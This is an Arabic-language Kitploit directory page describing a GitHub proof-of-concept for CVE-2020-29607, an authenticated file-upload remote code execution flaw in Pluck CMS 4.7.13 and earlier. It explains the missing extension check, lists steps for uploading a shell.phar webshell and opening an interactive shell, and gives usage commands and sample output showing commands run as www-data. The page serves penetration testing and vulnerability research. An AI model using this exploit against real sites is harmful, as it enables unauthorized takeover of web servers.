Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — تنفيذ تعليمات برمجية عن بُعد للمستخدمين المصادق عليهم في نظام إدارة المحتوى Pluck قبل الإصدار 4.7.13. | Kitploit
أدوات/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

تنفيذ تعليمات برمجية عن بُعد للمستخدمين المصادق عليهم في نظام إدارة المحتوى Pluck قبل الإصدار 4.7.13.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

CVE-2020-29607 — Pluck CMS <= 4.7.13 ثغرة رفع ملفات موثقة تؤدي إلى تنفيذ أوامر عن بُعد (PoC)

تنفيذ أوامر عن بُعد موثّق في Pluck CMS قبل الإصدار 4.7.13. لا يتحقق مدير الملفات الخاص بالمشرف (admin.php?action=files) من امتدادات الملفات، مما يسمح برفع ملفات .phar التي ينفذها Apache كـ PHP. يؤدي رصد شل ويب عبر هذه النقطة إلى تنفيذ الأوامر كمستخدم خادم الويب.


كيف يعمل

  1. يتم تسجيل الدخول باستخدام كلمة مرور المشرف المقدمة.
  2. يرفع شل ويب PHP تحت اسم shell.phar عبر مدير ملفات المشرف.
  3. يتحقق من التنفيذ عن طريق طلب الشل وتشغيل id.
  4. يفتح حلقة أوامر تفاعلية ضد الشل المرفوع.

المتطلبات

  • Python 3
  • تثبيت التبعيات:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

الاستخدام

root@kitploit:~
# Pluck في المسار الرئيسي
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck في مجلد فرعي
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

مثال:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] يتم تسجيل الدخول...
[+] تم تسجيل الدخول
[*] جارٍ رفع شل الويب...
[+] تم رفع شل الويب
[*] عنوان شل: http://10.10.10.10/files/shell.phar
[+] الهدف ضعيف! المخرجات: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] تم فتح الشل. اكتب 'exit' أو Ctrl+C للخروج.

Shell> whoami
www-data

المراجع

  • CVE-2020-29607
  • EDB-49909
  • PoC الأصلي بواسطة Ron Jost (Hacker5preme)

الإسناد

  • الاكتشاف والاستغلال الأصلي: Ron Jost (Hacker5preme)
  • نقل إلى Python 3 والشل التفاعلي: Esteban Zárate
تنزيل الأداة